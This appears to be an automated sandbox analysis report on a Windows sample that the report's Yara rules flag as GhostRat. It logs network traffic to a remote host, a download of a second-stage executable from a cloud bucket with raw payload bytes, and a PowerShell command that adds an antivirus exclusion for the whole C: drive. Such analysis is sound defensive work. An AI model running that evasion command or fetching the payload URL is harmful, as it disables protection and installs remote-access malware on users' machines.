                                                                                  Jan 8, 2025 07:16:28.202665091 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:28.245110989 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:28.249893904 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:43.500650883 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:43.507019043 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:43.823045015 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:43.874588966 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:43.935399055 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:43.941776991 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:00.624661922 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:00.624710083 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:00.629667044 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:00.629740953 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:02.593805075 CET5000815092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:02.598731995 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:02.598824978 CET5000815092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:08.536616087 CET5000815092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:08.541791916 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:08.541805029 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:08.541814089 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:08.541932106 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:09.086380005 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:09.087634087 CET5000815092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:09.092478991 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:19.749989986 CET5000815092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:19.750078917 CET5000815092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:19.754928112 CET1509250008154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:19.755008936 CET5000815092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:21.691200018 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:21.696054935 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:21.696193933 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:27.401304007 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:27.406187057 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:27.406244040 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:27.406255007 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:27.406297922 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:27.946089029 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:27.946420908 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:27.951272964 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:38.796770096 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:38.801810980 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:39.114118099 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:39.227540016 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:39.232455969 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:55.290074110 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:55.290074110 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:55.294985056 CET1509150009154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:55.297535896 CET5000915091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:57.237231970 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:17:57.242224932 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:17:57.245352983 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:02.481282949 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:02.486263037 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:02.486274958 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:02.486289978 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:02.486469030 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:03.028882980 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:03.029442072 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:03.034224033 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:13.987338066 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:13.992186069 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:14.307631016 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:14.359114885 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:14.517318964 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:14.522202969 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:29.781157017 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:29.781384945 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:29.786601067 CET1509250010154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:29.786928892 CET5001015092192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:31.719363928 CET5001115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:31.724330902 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:31.724392891 CET5001115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:37.350807905 CET5001115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:37.355880976 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:37.356000900 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:37.356010914 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:37.356019974 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:37.671114922 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:37.671344042 CET5001115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:37.676135063 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:49.764944077 CET5001115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:49.769757986 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:50.081504107 CET1509150011154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:18:50.125088930 CET5001115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:50.257190943 CET5001115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:18:50.262011051 CET1509150011154.82.85.107192.168.2.4

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 8, 2025 07:15:03.068156004 CET5281353192.168.2.41.1.1.1
                                                                                  Jan 8, 2025 07:15:03.337126970 CET53528131.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 8, 2025 07:15:03.068156004 CET192.168.2.41.1.1.10xdfbcStandard query (0)xrpy.oss-ap-southeast-1.aliyuncs.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 8, 2025 07:15:03.337126970 CET1.1.1.1192.168.2.40xdfbcNo error (0)xrpy.oss-ap-southeast-1.aliyuncs.com47.79.48.230A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • xrpy.oss-ap-southeast-1.aliyuncs.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.44973247.79.48.2304432004C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-08 06:15:04 UTC128OUTGET /wpsv.5.6.3.exe HTTP/1.1
                                                                                  User-Agent: URLDownloader
                                                                                  Host: xrpy.oss-ap-southeast-1.aliyuncs.com
                                                                                  Cache-Control: no-cache
                                                                                  2025-01-08 06:15:05 UTC562INHTTP/1.1 200 OK
                                                                                  Server: AliyunOSS
                                                                                  Date: Wed, 08 Jan 2025 06:15:05 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 3027728
                                                                                  Connection: close
                                                                                  x-oss-request-id: 677E17E957675839355C7E86
                                                                                  Accept-Ranges: bytes
                                                                                  ETag: "B52BA2B99108C496389AE5BB81FA6537"
                                                                                  Last-Modified: Fri, 27 Dec 2024 16:38:48 GMT
                                                                                  x-oss-object-type: Normal
                                                                                  x-oss-hash-crc64ecma: 7602638133618041147
                                                                                  x-oss-storage-class: Standard
                                                                                  x-oss-ec: 0048-00000113
                                                                                  Content-Disposition: attachment
                                                                                  x-oss-force-download: true
                                                                                  Content-MD5: tSuiuZEIxJY4muW7gfplNw==
                                                                                  x-oss-server-time: 10
                                                                                  2025-01-08 06:15:05 UTC15822INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 a0 86 ad 35 c1 e8 fe 35 c1 e8 fe 35 c1 e8 fe 6e a9 eb ff 2e c1 e8 fe 6e a9 ed ff e6 c1 e8 fe ab 61 2f fe 3c c1 e8 fe e0 ac ec ff 26 c1 e8 fe e0 ac eb ff 2f c1 e8 fe 6e a9 ef ff 34 c1 e8 fe 6e a9 ee ff 34 c1 e8 fe e0 ac ed ff ab c1 e8 fe 6e a9 ec ff 15 c1 e8 fe 6e a9 e9 ff 36 c1 e8 fe 35 c1 e8 fe 20 c1 e8 fe 97 af ec ff 96 c3 e8 fe 35 c1 e9 fe 56 c3 e8 fe 97 af ed ff b8 c1 e8
                                                                                  Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$q555n.na/<&/n4n4nn65 5V
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: e7 7e 20 a6 11 fb 69 3d b7 c4 41 2d 08 0c 52 a9 34 d8 d9 4d 02 02 04 d6 ce b7 a4 04 26 15 31 08 f0 26 7a 23 29 68 08 fb 4c 15 9f 22 c6 c6 c0 be 7c 00 54 7e a0 4c 4a 04 09 f1 09 18 9b a8 02 ae ac 23 9c 23 c3 0b 0c 9c 96 27 05 1b 8a 55 8c 6e a3 42 ff 08 8d 6d 08 80 fa 94 7e fe a1 db 84 83 44 80 05 0b 4e d0 2f 94 e4 0c 3c d1 e9 3a d1 54 1a 3c df ea 89 e8 18 89 18 39 06 06 99 99 6d 1a 11 07 d1 e7 24 48 22 48 2e df 66 ed 20 e7 2a d3 14 c3 94 d0 00 d4 a5 3b d3 e0 0c d3 06 70 99 03 e7 33 a5 41 03 ab 0d 08 c0 0a 31 6b a6 29 95 0a 0a 1c cb 30 d0 16 1d 9c 91 03 26 40 44 c5 06 a7 43 f9 ba b4 24 f8 0e fc b1 8e c8 14 0f d5 25 89 19 95 9a 01 0a 17 f8 82 01 c0 cb 07 bc 48 03 4c 03 40 38 4f 81 eb 10 08 06 70 4d 1c bf d0 13 81 01 c0 f6 dc 34 89 56 f3 e7 69 f6 79 4c 18 1c
                                                                                  Data Ascii: ~ i=A-R4M&1&z#)hL"|T~LJ##'UnBm~DN/<:T<9m$H"H.f *;p3A1k)0&@DC$%HL@8OpM4ViyL
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 04 ff 20 c0 63 0b 4d d5 80 78 b7 ff ff ff 82 05 51 62 09 f9 11 bd de c0 7d 3f f2 30 fb 41 68 39 b0 c2 2e 33 4e a7 85 c4 d1 f9 78 ff ff bf eb ef e9 7c 66 13 1a f5 97 de f0 bb 67 f9 9b ab ee 86 73 9b 23 6c 56 0d a0 da 4c ff ff ff ff ff 2b c5 92 db ee bd ba 3a 54 21 c0 5c fe 21 f1 bd ac af a3 7a 52 62 15 8b 8f b5 82 c6 1a fb 22 e3 ff ff ff bc a2 05 42 fe b4 12 6b ad a9 76 b7 6b 1c d8 34 5c 7d d5 a9 0d 91 f6 c1 47 69 bc ff ff ff bf c2 b7 fc 84 2e a0 8e 3f 52 3b bd 1f 28 6b c8 13 37 d6 44 e9 8d 08 92 96 e5 2c 57 34 59 21 04 ff ff ff ff a8 aa 56 25 a4 c8 ae 68 17 9e a4 f4 42 64 57 4b 54 85 8a d1 09 09 25 18 05 b0 09 9d d9 75 21 d3 ff ff ff ff 75 31 f8 35 46 c8 d4 47 9d 87 eb 40 95 19 24 7c 6e e9 d5 14 aa c3 be 22 18 c1 a0 5f 34 98 c2 4d ff ff ff ff 3f a6 09 57
                                                                                  Data Ascii: cMxQb}?0Ah9.3Nx|fgs#lVL+:T!\!zRb"Bkvk4\}Gi.?R;(k7D,W4Y!V%hBdWKT%u!u15FG@$|n"_4M?W
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 80 ff ff ff bf 12 9f 9d 0a df b5 38 61 89 fb 67 45 9c 39 f9 84 54 c4 d6 6f 00 39 90 82 fa ce ae e8 af a4 97 ff ff bf e8 3a fe 71 14 00 d1 9e 33 41 63 ca a5 5a 8b 09 2a 26 ef 96 b7 5d c4 92 fa 51 db 0d ff ff ff 1d 63 5f 7c 94 53 84 ed a3 99 07 9f dc 55 b3 31 67 1a 63 05 ec 36 79 57 b0 c3 ff ff ff ff dd d5 6a 21 fc 54 e6 28 c4 f1 d2 ce 02 43 50 30 15 4d 3c d0 1c f6 7e d0 a4 86 e7 f5 c2 06 c5 c4 ff ff ff ff a8 e2 d3 c7 cf bd ab 9f e3 42 c4 cd 65 fa d3 cd df 55 c4 ce 6e e8 fc 96 0f e2 92 ca de 37 7c c9 ff 9b fe ff 80 4a 54 e9 fd 3c 4b 81 b8 d9 1a f1 91 5d 9d 7c d1 78 e2 1e 0e 09 62 dd c6 b9 ff ff 55 ff de 29 ba b0 62 49 53 b6 b0 bf 4d 77 a4 d1 0b f0 31 2e e5 71 2e 18 a4 a7 cb a6 fd ff 2f f8 30 24 11 8d 16 ba 6a 19 de 3c 5a 00 a6 e2 43 98 e8 83 10 76 ef ca 67
                                                                                  Data Ascii: 8agE9To9:q3AcZ*&]Qc_|SU1gc6yWj!T(CP0M<~BeUn7|JT<K]|xbU)bISMw1.q./0$j<ZCvg
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 15 55 cd 04 db 73 db ff ff 17 fd 47 5f 83 6e d1 5a 90 bb f7 bb 84 58 ce 75 e8 d2 92 d5 b7 76 f2 94 67 27 5f 32 ff 5f 45 ea 91 3a af 46 92 ce 63 b7 45 27 b4 b8 7a 1e 4e de cb ff ff ff ff c8 5e d3 bb 52 91 d5 72 ad 98 ec 07 a1 56 b4 8e 04 fa 48 3f 17 07 f7 ef 92 61 69 af dd fc 76 03 ff bb fe ff e2 e9 e2 be 5c f2 8a c5 99 51 7f a4 f1 ac 16 86 f5 b8 95 88 87 db 27 2e 63 12 ff ff ff ff 31 7d 6b 2b a0 9b b5 f9 82 42 04 94 ee 60 6e 4e 54 9b fd eb 01 3a ad 42 eb 08 3c 6a a3 f2 46 fb 7f d3 ff ff 18 59 2c a3 0b 22 1d 5d 47 a6 8c 06 9c a1 cc 20 67 bd 76 94 9f c6 10 8c c8 15 ff ff ef fa 52 e3 19 a1 89 02 ad 4f 10 51 0a e4 4b 02 7b 0d 73 2d ae a4 68 1d b6 cf 58 67 fe ff ff ff c0 d0 ca 11 34 31 9e a3 bc 12 28 1e 8e 5a 63 f5 da f2 36 94 63 2c 39 3d f9 80 9f bf 8d ef 1f
                                                                                  Data Ascii: UsG_nZXuvg'_2_E:FcE'zN^RrVH?aiv\Q'.c1}k+B`nNT:B<jFY,"]G gvROQK{s-hXg41(Zc6c,9=
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 81 98 12 4f ec b6 e5 3a 96 a1 11 13 77 5f 0f 19 40 14 28 cc f1 3e 19 ff ff ff 5f a6 31 ac 5c ce d7 29 fa 02 3b 29 d8 3a 37 cb 94 b2 38 c7 7f 3a 46 d2 b7 fe fb 54 7c 01 a2 ff ff aa ff 9b 53 57 04 73 4e 06 90 e5 92 45 67 12 83 d7 31 59 a4 76 aa 7c de 72 92 11 94 ff ff ff 05 c6 e4 35 35 3a 2e ef 7c c1 91 76 d0 fe 84 d1 a1 f9 03 c3 ba 09 bb 2c e2 b5 06 ff ff ff ff 7e 23 b7 e0 c1 d3 fd 55 01 f3 ba c5 1b f8 02 60 92 0a 93 1c c4 19 03 88 f5 45 e5 8f 7d ce 2c 87 ff ff ff ff 2e f6 55 8c f9 b0 d2 72 2d 93 6d 28 6e 8e 3a ed 68 02 da 80 d0 71 4a 8f 06 59 38 89 81 cb 1a 74 ff ff ff ff 1e 62 a3 a5 b8 85 c3 d2 04 3d 3b 93 36 0c 12 55 fb 7b c8 a3 25 a7 93 b0 3e 49 86 bf 76 8f c4 4c ff ff ff ff fe ce 4a f6 2f 15 33 06 3a 35 49 e7 08 ff 99 ac f6 20 6d ab b2 05 a9 e4 06 57
                                                                                  Data Ascii: O:w_@(>_1\);):78:FT|SWsNEg1Yv|r55:.|v,~#U`E},.Ur-m(n:hqJY8tb=;6U{%>IvLJ/3:5I mW
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 5a 20 fa 3d 0a c5 d7 3f a6 c8 9b 76 e0 ec 9e 0b 23 e4 74 36 14 ff ff ff ff 6f 24 9d e7 b2 41 d7 68 37 67 dc 01 b1 20 f9 8b 0b f5 a7 95 78 a0 6c 4b c0 44 92 4a 75 0f 61 de ff ff ff ff c3 c2 3d 17 a0 4d 57 8b 11 35 bd 49 87 05 ba 5d 1f 76 d4 0f b0 5b 5f b7 f8 cf 12 54 19 9a 49 6a ff ff ff ff 42 ad 93 85 0b e7 8c 30 59 82 82 2d d9 89 f5 8c 39 9c f5 cd 25 22 74 cf 56 a2 15 40 a6 a8 fc dc 2a ea ff ff 85 9e ab d6 94 5d d6 73 07 ed 7b 76 11 67 f5 52 ac 1a 69 d0 ff ff ff ff aa 4d 11 e0 c4 4c 6e 9e 8e 13 46 0b 95 40 53 35 53 58 7f 81 5f 17 d7 5e 53 86 f3 1b 70 f1 95 8f ff ff ff ff f6 d4 6f 55 92 a2 38 d3 43 6c 7e a2 21 5b 18 11 dd 03 52 e6 e5 c0 c5 4e 8e da db 91 cf f7 75 c2 ff 6f f8 ff 33 69 d1 d1 29 9d 51 79 91 e4 58 05 a5 6c 16 3e 42 f3 c4 1f 88 94 fc 6b 53 b1
                                                                                  Data Ascii: Z =?v#t6o$Ah7g xlKDJua=MW5I]v[_TIjB0Y-9%"tV@*]s{vgRiMLnF@S5SX_^SpoU8Cl~![RNuo3i)QyXl>BkS
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: c7 74 ff ff 17 fd 08 91 1f d5 4c a9 32 33 ea b0 2c 0a 88 da f7 ca 91 f6 5f 9e 72 f6 18 f9 19 9d 57 8b f8 ff 84 f8 4c e1 eb 45 29 aa f2 a6 fd 64 f9 d2 1c c2 de ff ff ff ff 19 dd 0f 02 16 65 70 33 d4 32 67 7b c4 bb 11 60 4f c3 4d 29 23 7e 84 58 51 43 7e 25 4f 3d d4 e0 17 e0 ff ff 20 79 fd ce 59 49 f8 d1 53 ca 2d 66 ec e5 7f c8 14 06 c1 fc f2 61 a7 ff ff ff ff 1b f9 5e 97 fe 62 57 05 cc 6f 26 4b a6 40 33 72 20 d3 1e 2b b2 60 e7 56 da 87 d3 b4 5a 73 04 c9 ff ff ff ff c2 68 e3 18 74 d9 46 74 31 f4 f4 ab c4 0a bc 66 4e 23 5f 92 7c 0a 81 dd cc 79 ee b3 3d c0 91 81 ff ff ff ff d0 79 39 d2 69 5d dc c1 5c 61 b9 5e 87 32 73 70 d0 a8 7d b5 d0 fc f4 b6 55 9f 1f 8a ec f4 b0 47 a6 ff ff ff eb 3b 68 80 0b 79 d0 71 99 b1 d0 ed 1f 9f 6c 2d 9d ae 1c 62 3b ec 3e 2f b4 fa ff
                                                                                  Data Ascii: tL23,_rWLE)dep32g{`OM)#~XQC~%O= yYIS-fa^bWo&K@3r +`VZshtFt1fN#_|y=y9i]\a^2sp}UG;hyql-b;>/
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 46 a5 10 08 d1 db fb 9d d4 05 fc ff ff ff 01 5e 66 4d f9 32 9b 5b fe 7a 60 63 77 9a 31 34 e5 9a 82 2d 2b b7 e0 04 8f 86 f3 b2 16 86 ff ff ff 77 96 9d 80 e7 62 df 77 da f4 fc b7 42 9d ac cb 11 ff 0c 6f 4e 16 0c 59 04 05 8f 88 64 ff ff ff ff 37 e6 6c ee 64 58 79 60 d4 2f b7 90 59 fb 82 3b 20 2e 2b ba 15 fb f7 5b 1d 81 8a 8a 8f e3 39 92 ff bf e8 ff 34 fc 3a 67 ce b6 a0 9b 56 78 96 fa bf 9c 83 9e 19 66 20 42 b2 78 62 42 dd df e8 ff ff ff 98 ab 0c 3d 41 b5 74 c1 2d f0 02 58 6e b3 4d 7b 41 1c f1 09 c1 bb 84 67 f8 24 77 ff ff ff bf 56 7a 63 87 0d f2 c5 af e4 b5 c6 3b ad 66 5e ae 90 c2 24 27 7a 0b ed 1b 86 5d 02 19 85 78 c8 ff ff ff ff b1 ce e7 c9 5c ce 43 58 ac 1c 4e cd b8 3a b8 7a f3 79 4b 97 cf be 88 24 d0 9a 5a 55 43 0c 48 a2 ff ff ff ff 7f af 4b d8 16 02 fb
                                                                                  Data Ascii: F^fM2[z`cw14-+wbwBoNYd7ldXy`/Y; .+[94:gVxf BxbB=At-XnM{Ag$wVzc;f^$'z]x\CXN:zyK$ZUCHK
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: d9 eb 9b 43 c6 d9 c2 10 ab 42 e5 c6 17 fc ff ff 4a e6 3e de 9d ac 8e 95 f0 db 48 95 c2 87 6b 7f de 09 db ed 49 19 38 a4 5c df ff ff ff ff fa 2e 15 d0 b6 46 32 c9 7f 7e 01 d3 25 45 0e 5b 0d f0 67 e3 d9 df 4f 3b 6f b3 15 c5 6b 91 75 a2 ff 77 fc ff af 42 3a 14 50 d9 4f 19 65 12 83 5d 8f 8a f8 89 cc 7f 1a de 5b 44 34 98 0f 8e 9b fe ff ff 5a 5e 03 41 3e 66 9b 16 f5 91 7c b0 c1 bf a2 10 0b 60 3a 63 0c cf d8 d6 42 88 ff ff ff ff 1f 36 8e 15 db 5d 3f e7 f1 9a 73 2b 74 0c d5 09 ab 01 2e 52 6f 03 f6 c9 0b eb a5 ce 2e 1c 02 35 ff ff ff ff ca ce fe 4b ad 67 21 f8 44 ea 70 f2 3d fc 43 77 05 26 be af 99 ab 41 d4 cc 53 33 33 cd b4 2d 76 4a 03 ff ff fb ae 0c ac c1 d0 42 fb 45 4a 6e 55 d2 93 ef b9 58 ff ff ff ff ce 94 c2 01 df 27 c8 47 ff 74 fb 84 c5 a2 78 1f 4f 73 12 ec
                                                                                  Data Ascii: CBJ>HkI8\.F2~%E[gO;okuwB:POe][D4Z^A>f|`:cB6]?s+t.Ro.5Kg!Dp=Cw&AS33-vJBEJnUX'GtxOs


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:01:14:55
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\leBwnyHIgx.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:2'581'432 bytes
                                                                                  MD5 hash:2A7776214C4870137FE8AABB231CF52E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:01:14:58
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:01:14:58
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:01:14:58
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:01:15:00
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff693ab0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:2'581'432 bytes
                                                                                  MD5 hash:2A7776214C4870137FE8AABB231CF52E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
